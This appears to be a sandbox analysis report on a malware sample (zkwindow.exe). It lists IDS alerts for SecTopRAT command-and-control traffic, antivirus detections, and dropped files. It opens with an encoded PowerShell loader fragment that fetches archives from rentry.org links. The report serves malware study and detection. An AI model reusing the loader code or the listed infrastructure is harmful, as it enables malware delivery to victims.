AC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAA

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-10T21:40:44.737773+010020522481A Network Trojan was detected192.168.2.44972792.255.85.369000TCP
                            2025-03-10T21:40:45.540936+010020522481A Network Trojan was detected192.168.2.44972892.255.85.369000TCP
                            2025-03-10T21:40:46.347619+010020522481A Network Trojan was detected192.168.2.44972992.255.85.369000TCP
                            2025-03-10T21:40:47.150924+010020522481A Network Trojan was detected192.168.2.44973092.255.85.369000TCP
                            2025-03-10T21:40:47.954352+010020522481A Network Trojan was detected192.168.2.44973192.255.85.369000TCP
                            2025-03-10T21:40:48.764207+010020522481A Network Trojan was detected192.168.2.44973292.255.85.369000TCP
                            2025-03-10T21:40:49.555415+010020522481A Network Trojan was detected192.168.2.44973392.255.85.369000TCP
                            2025-03-10T21:40:50.383096+010020522481A Network Trojan was detected192.168.2.44973492.255.85.369000TCP
                            2025-03-10T21:40:51.182444+010020522481A Network Trojan was detected192.168.2.44973592.255.85.369000TCP
                            2025-03-10T21:40:52.055743+010020522481A Network Trojan was detected192.168.2.44973692.255.85.369000TCP
                            2025-03-10T21:40:52.856218+010020522481A Network Trojan was detected192.168.2.44973792.255.85.369000TCP
                            2025-03-10T21:40:53.663340+010020522481A Network Trojan was detected192.168.2.44973892.255.85.369000TCP
                            2025-03-10T21:40:54.952951+010020522481A Network Trojan was detected192.168.2.44973992.255.85.369000TCP
                            2025-03-10T21:40:55.766552+010020522481A Network Trojan was detected192.168.2.44974092.255.85.369000TCP
                            2025-03-10T21:40:56.553909+010020522481A Network Trojan was detected192.168.2.44974192.255.85.369000TCP
                            2025-03-10T21:40:57.362336+010020522481A Network Trojan was detected192.168.2.44974292.255.85.369000TCP
                            2025-03-10T21:40:58.170441+010020522481A Network Trojan was detected192.168.2.44974392.255.85.369000TCP
                            2025-03-10T21:40:58.997066+010020522481A Network Trojan was detected192.168.2.44974492.255.85.369000TCP
                            2025-03-10T21:40:59.817684+010020522481A Network Trojan was detected192.168.2.44974592.255.85.369000TCP
                            2025-03-10T21:41:00.655307+010020522481A Network Trojan was detected192.168.2.44974692.255.85.369000TCP
                            2025-03-10T21:41:01.488955+010020522481A Network Trojan was detected192.168.2.44974792.255.85.369000TCP
                            2025-03-10T21:41:02.300753+010020522481A Network Trojan was detected192.168.2.44974892.255.85.369000TCP
                            2025-03-10T21:41:03.177936+010020522481A Network Trojan was detected192.168.2.44974992.255.85.369000TCP
                            2025-03-10T21:41:04.132136+010020522481A Network Trojan was detected192.168.2.44975092.255.85.369000TCP
                            2025-03-10T21:41:04.978072+010020522481A Network Trojan was detected192.168.2.44975192.255.85.369000TCP
                            2025-03-10T21:41:05.857393+010020522481A Network Trojan was detected192.168.2.44975292.255.85.369000TCP
                            2025-03-10T21:41:06.668093+010020522481A Network Trojan was detected192.168.2.44975392.255.85.369000TCP
                            2025-03-10T21:41:07.542467+010020522481A Network Trojan was detected192.168.2.44975492.255.85.369000TCP
                            2025-03-10T21:41:08.362304+010020522481A Network Trojan was detected192.168.2.44975592.255.85.369000TCP
                            2025-03-10T21:41:09.166694+010020522481A Network Trojan was detected192.168.2.44975692.255.85.369000TCP
                            2025-03-10T21:41:09.993094+010020522481A Network Trojan was detected192.168.2.44975792.255.85.369000TCP
                            2025-03-10T21:41:10.794791+010020522481A Network Trojan was detected192.168.2.44975892.255.85.369000TCP
                            2025-03-10T21:41:11.608970+010020522481A Network Trojan was detected192.168.2.44975992.255.85.369000TCP
                            2025-03-10T21:41:12.400174+010020522481A Network Trojan was detected192.168.2.44976092.255.85.369000TCP
                            2025-03-10T21:41:13.259205+010020522481A Network Trojan was detected192.168.2.44976192.255.85.369000TCP
                            2025-03-10T21:41:14.065699+010020522481A Network Trojan was detected192.168.2.44976292.255.85.369000TCP
                            2025-03-10T21:41:14.854544+010020522481A Network Trojan was detected192.168.2.44976392.255.85.369000TCP
                            2025-03-10T21:41:15.651693+010020522481A Network Trojan was detected192.168.2.44976492.255.85.369000TCP
                            2025-03-10T21:41:16.496242+010020522481A Network Trojan was detected192.168.2.44976592.255.85.369000TCP
                            2025-03-10T21:41:17.322419+010020522481A Network Trojan was detected192.168.2.44976692.255.85.369000TCP
                            2025-03-10T21:41:18.139484+010020522481A Network Trojan was detected192.168.2.44976792.255.85.369000TCP
                            2025-03-10T21:41:18.939448+010020522481A Network Trojan was detected192.168.2.44976892.255.85.369000TCP
                            2025-03-10T21:41:19.740993+010020522481A Network Trojan was detected192.168.2.44976992.255.85.369000TCP
                            2025-03-10T21:41:20.540608+010020522481A Network Trojan was detected192.168.2.44977092.255.85.369000TCP
                            2025-03-10T21:41:21.347186+010020522481A Network Trojan was detected192.168.2.44977192.255.85.369000TCP
                            2025-03-10T21:41:22.134949+010020522481A Network Trojan was detected192.168.2.44977292.255.85.369000TCP
                            2025-03-10T21:41:22.970185+010020522481A Network Trojan was detected192.168.2.44977392.255.85.369000TCP
                            2025-03-10T21:41:23.779759+010020522481A Network Trojan was detected192.168.2.44977492.255.85.369000TCP
                            2025-03-10T21:41:24.593845+010020522481A Network Trojan was detected192.168.2.44977592.255.85.369000TCP
                            2025-03-10T21:41:25.398400+010020522481A Network Trojan was detected192.168.2.44977692.255.85.369000TCP
                            2025-03-10T21:41:26.204791+010020522481A Network Trojan was detected192.168.2.44977792.255.85.369000TCP
                            2025-03-10T21:41:27.033444+010020522481A Network Trojan was detected192.168.2.44977892.255.85.369000TCP
                            2025-03-10T21:41:27.830174+010020522481A Network Trojan was detected192.168.2.44977992.255.85.369000TCP
                            2025-03-10T21:41:28.622811+010020522481A Network Trojan was detected192.168.2.44978092.255.85.369000TCP
                            2025-03-10T21:41:29.476942+010020522481A Network Trojan was detected192.168.2.44978192.255.85.369000TCP
                            2025-03-10T21:41:30.313095+010020522481A Network Trojan was detected192.168.2.44978292.255.85.369000TCP
                            2025-03-10T21:41:31.128979+010020522481A Network Trojan was detected192.168.2.44978392.255.85.369000TCP
                            2025-03-10T21:41:31.923395+010020522481A Network Trojan was detected192.168.2.44978492.255.85.369000TCP
                            2025-03-10T21:41:32.741717+010020522481A Network Trojan was detected192.168.2.44978592.255.85.369000TCP
                            2025-03-10T21:41:33.555054+010020522481A Network Trojan was detected192.168.2.44978692.255.85.369000TCP
                            2025-03-10T21:41:37.357080+010020522481A Network Trojan was detected192.168.2.44978792.255.85.369000TCP
                            2025-03-10T21:41:38.154126+010020522481A Network Trojan was detected192.168.2.44978892.255.85.369000TCP
                            2025-03-10T21:41:39.018166+010020522481A Network Trojan was detected192.168.2.44978992.255.85.369000TCP
                            2025-03-10T21:41:40.055225+010020522481A Network Trojan was detected192.168.2.44979092.255.85.369000TCP
                            2025-03-10T21:41:40.936232+010020522481A Network Trojan was detected192.168.2.44979192.255.85.369000TCP
                            2025-03-10T21:41:41.767633+010020522481A Network Trojan was detected192.168.2.44979292.255.85.369000TCP
                            2025-03-10T21:41:42.572452+010020522481A Network Trojan was detected192.168.2.44979392.255.85.369000TCP
                            2025-03-10T21:41:43.369423+010020522481A Network Trojan was detected192.168.2.44979492.255.85.369000TCP
                            2025-03-10T21:41:44.195409+010020522481A Network Trojan was detected192.168.2.44979592.255.85.369000TCP
                            2025-03-10T21:41:44.994550+010020522481A Network Trojan was detected192.168.2.44979692.255.85.369000TCP
                            2025-03-10T21:41:46.157585+010020522481A Network Trojan was detected192.168.2.44979792.255.85.369000TCP
                            2025-03-10T21:41:47.049082+010020522481A Network Trojan was detected192.168.2.44979892.255.85.369000TCP
                            2025-03-10T21:41:47.861422+010020522481A Network Trojan was detected192.168.2.44979992.255.85.369000TCP
                            2025-03-10T21:41:48.656627+010020522481A Network Trojan was detected192.168.2.44980092.255.85.369000TCP
                            2025-03-10T21:41:49.488565+010020522481A Network Trojan was detected192.168.2.44980192.255.85.369000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-10T21:40:49.555415+010028033053Unknown Traffic192.168.2.44973392.255.85.369000TCP
                            2025-03-10T21:40:51.182444+010028033053Unknown Traffic192.168.2.44973592.255.85.369000TCP
                            2025-03-10T21:40:52.856218+010028033053Unknown Traffic192.168.2.44973792.255.85.369000TCP
                            2025-03-10T21:40:58.170441+010028033053Unknown Traffic192.168.2.44974392.255.85.369000TCP
                            2025-03-10T21:40:58.997066+010028033053Unknown Traffic192.168.2.44974492.255.85.369000TCP
                            2025-03-10T21:41:00.655307+010028033053Unknown Traffic192.168.2.44974692.255.85.369000TCP
                            2025-03-10T21:41:04.978072+010028033053Unknown Traffic192.168.2.44975192.255.85.369000TCP
                            2025-03-10T21:41:08.362304+010028033053Unknown Traffic192.168.2.44975592.255.85.369000TCP
                            2025-03-10T21:41:09.166694+010028033053Unknown Traffic192.168.2.44975692.255.85.369000TCP
                            2025-03-10T21:41:10.794791+010028033053Unknown Traffic192.168.2.44975892.255.85.369000TCP
                            2025-03-10T21:41:12.400174+010028033053Unknown Traffic192.168.2.44976092.255.85.369000TCP
                            2025-03-10T21:41:15.651693+010028033053Unknown Traffic192.168.2.44976492.255.85.369000TCP
                            2025-03-10T21:41:18.139484+010028033053Unknown Traffic192.168.2.44976792.255.85.369000TCP
                            2025-03-10T21:41:19.740993+010028033053Unknown Traffic192.168.2.44976992.255.85.369000TCP
                            2025-03-10T21:41:24.593845+010028033053Unknown Traffic192.168.2.44977592.255.85.369000TCP
                            2025-03-10T21:41:26.204791+010028033053Unknown Traffic192.168.2.44977792.255.85.369000TCP
                            2025-03-10T21:41:29.476942+010028033053Unknown Traffic192.168.2.44978192.255.85.369000TCP
                            2025-03-10T21:41:30.313095+010028033053Unknown Traffic192.168.2.44978292.255.85.369000TCP
                            2025-03-10T21:41:31.923395+010028033053Unknown Traffic192.168.2.44978492.255.85.369000TCP
                            2025-03-10T21:41:32.741717+010028033053Unknown Traffic192.168.2.44978592.255.85.369000TCP
                            2025-03-10T21:41:33.555054+010028033053Unknown Traffic192.168.2.44978692.255.85.369000TCP
                            2025-03-10T21:41:38.154126+010028033053Unknown Traffic192.168.2.44978892.255.85.369000TCP
                            2025-03-10T21:41:39.018166+010028033053Unknown Traffic192.168.2.44978992.255.85.369000TCP
                            2025-03-10T21:41:40.936232+010028033053Unknown Traffic192.168.2.44979192.255.85.369000TCP
                            2025-03-10T21:41:41.767633+010028033053Unknown Traffic192.168.2.44979292.255.85.369000TCP
                            2025-03-10T21:41:43.369423+010028033053Unknown Traffic192.168.2.44979492.255.85.369000TCP
                            2025-03-10T21:41:44.195409+010028033053Unknown Traffic192.168.2.44979592.255.85.369000TCP
                            2025-03-10T21:41:44.994550+010028033053Unknown Traffic192.168.2.44979692.255.85.369000TCP
                            2025-03-10T21:41:47.049082+010028033053Unknown Traffic192.168.2.44979892.255.85.369000TCP
                            2025-03-10T21:41:47.861422+010028033053Unknown Traffic192.168.2.44979992.255.85.369000TCP
                            2025-03-10T21:41:48.656627+010028033053Unknown Traffic192.168.2.44980092.255.85.369000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-10T21:39:52.676861+010028032742Potentially Bad Traffic192.168.2.449717164.132.58.105443TCP
                            2025-03-10T21:40:04.057568+010028032742Potentially Bad Traffic192.168.2.449724188.114.97.3443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-10T21:39:49.797987+010018100002Potentially Bad Traffic192.168.2.449715164.132.58.105443TCP
                            2025-03-10T21:39:52.676861+010018100002Potentially Bad Traffic192.168.2.449717164.132.58.105443TCP
                            2025-03-10T21:39:56.395602+010018100002Potentially Bad Traffic192.168.2.449718188.114.97.3443TCP
                            2025-03-10T21:40:04.057568+010018100002Potentially Bad Traffic192.168.2.449724188.114.97.3443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://main-connection.click/Download_StarW3_pack.zip8Avira URL Cloud: Label: malware
                            Source: https://main-connection.click/Download_StarW3_pack.zipAvira URL Cloud: Label: malware
                            Source: https://main-connection.click/archive.Avira URL Cloud: Label: malware
                            Source: https://main-connection.clickAvira URL Cloud: Label: malware
                            Source: http://main-connection.clickAvira URL Cloud: Label: malware
                            Source: https://main-connection.click/archive.zipAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispAvira: detection malicious, Label: TR/Agent.dtyjl
                            Source: C:\Users\user\AppData\Local\Temp\vpdcuvmAvira: detection malicious, Label: TR/Agent.dtyjl
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispReversingLabs: Detection: 73%
                            Source: C:\Users\user\AppData\Local\Temp\vpdcuvmReversingLabs: Detection: 73%
                            Multi AV Scanner detection for submitted file
                            Source: zkwindow.exeVirustotal: Detection: 18%Perma Link
                            Joe Sandbox ML detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D4D094 CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError,11_2_00D4D094
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D7147C CryptReleaseContext,11_2_00D7147C
                            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
                            Source: zkwindow.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: F:\scintilla\bin\Scintilla.pdb source: AUpdate.exe, 0000000B.00000002.1620913384.0000000001636000.00000002.00000001.01000000.0000000A.sdmp, isscint.dll.9.dr
                            Source: Binary string: wntdll.pdbUGP source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D44C4 FindFirstFileExW,0_2_00007FF7013D44C4
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D4648 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7013D4648
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008E91B4 FindFirstFileW,FindFirstFileW,free,9_2_008E91B4
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D4C85C FindFirstFileW,FindNextFileW,FindClose,11_2_00D4C85C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D68844 FindFirstFileW,FindNextFileW,FindClose,11_2_00D68844
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D6082C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,11_2_00D6082C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D609B8 FindFirstFileW,FindNextFileW,FindClose,11_2_00D609B8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4B190 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_00C4B190
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4B75C FindFirstFileW,FindClose,11_2_00C4B75C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008EA254 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,9_2_008EA254
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov r9, qword ptr [rdi+40h]9_2_009BC0D0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov eax, dword ptr [rbp+00000120h]9_2_00990040
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then cmp dword ptr [rdi], 11h9_2_009A02F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov ecx, dword ptr [r9]9_2_009B43E0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then cmp ebp, 00010000h9_2_0099C4D0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov rbx, rdi9_2_009C4510
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov ecx, dword ptr [rdx-08h]9_2_009AC530
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx eax, byte ptr [r11]9_2_009AC530
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, eax9_2_009926F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov dword ptr [rax+78h], edx9_2_009C0780
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then add rcx, rcx9_2_009B0770
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then cmp byte ptr [rdi+000001ECh], r12L9_2_009969E0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov rax, qword ptr [rbx+000001A0h]9_2_00992900
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov r10, qword ptr [r11-08h]9_2_009C4930
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx eax, byte ptr [rcx]9_2_009A0940
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx eax, byte ptr [r9+01h]9_2_009AA970
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov r9d, ebx9_2_009B8B90
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then lea edx, dword ptr [rdi+rdi]9_2_0099CBF0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov rax, qword ptr [rbp+00000080h]9_2_00998D10
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then inc edx9_2_009B8D70
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov rax, r89_2_009B8EE0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx eax, byte ptr [r15+rsi]9_2_009B0E10
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then add rbp, 10h9_2_009A1020
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [rsp+40h]9_2_009A1020
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov ecx, ebx9_2_009B51F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [r9+04h]9_2_009952A0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [r8+04h]9_2_009952A0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov qword ptr [rcx], rbx9_2_009C53F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov byte ptr [rax-01h], bl9_2_009A14B0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [rsp+rbp*4+30h]9_2_009A14B0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov eax, dword ptr [r8]9_2_009AD6D0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov ecx, dword ptr [rbx+70h]9_2_009BD640
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov qword ptr [rsp+rax*8+30h], FFFFFFFFFFFFFFFFh9_2_009BD640
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx ecx, byte ptr [rdx-01h]9_2_009AB720
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov r11d, dword ptr [rcx+r10*4-04h]9_2_009BDC10
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx r8d, byte ptr [r11-01h]9_2_0099BD41
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then movzx r8d, byte ptr [r11-01h]9_2_0099BD40
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov qword ptr [rcx], rdx9_2_009A9FC0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [r8+04h]9_2_00995F50
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 4x nop then mov edx, dword ptr [r8+04h]9_2_00995F50

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49733 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49739 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49730 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49740 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49732 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49744 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49731 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49736 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49743 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49750 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49737 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49752 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49742 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49745 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49747 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49748 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49749 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49734 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49735 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49741 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49727 -> 92.255.85.36:9000
